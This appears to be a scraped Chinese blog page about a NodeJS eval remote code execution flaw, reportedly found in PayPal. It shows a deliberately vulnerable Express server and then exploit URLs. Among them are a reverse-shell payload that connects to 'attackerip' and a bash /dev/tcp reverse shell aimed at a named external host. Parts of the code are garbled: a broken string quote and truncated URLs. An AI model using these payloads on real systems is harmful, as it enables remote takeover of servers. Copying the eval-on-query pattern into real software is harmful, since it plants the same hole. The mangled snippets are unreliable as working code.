背景

@Artsploit在挖PayPal的漏洞时,发现一处NodeJS代码执行,奖励$10000美金。

测试

var express = require('express'); 
var app = express(); 
app.get('/', function (req, res) { 
  res.send('Hello eval(req.query.q));
  console.log(req.query.q);
});
app.listen(8080, function () { 
  console.log('Example listening on port 8080!');
});

任意文件读取

http://host:8080/"htmlcode">
http://host:8080/"net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

GET SHELL2

http://host:8080/"child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')

标签:
nodejs,代码执行,nodejs远程代码执行漏洞

免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件! 如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com
狼山资源网 Copyright www.pvsay.com

评论“NodeJS远程代码执行”

暂无“NodeJS远程代码执行”评论...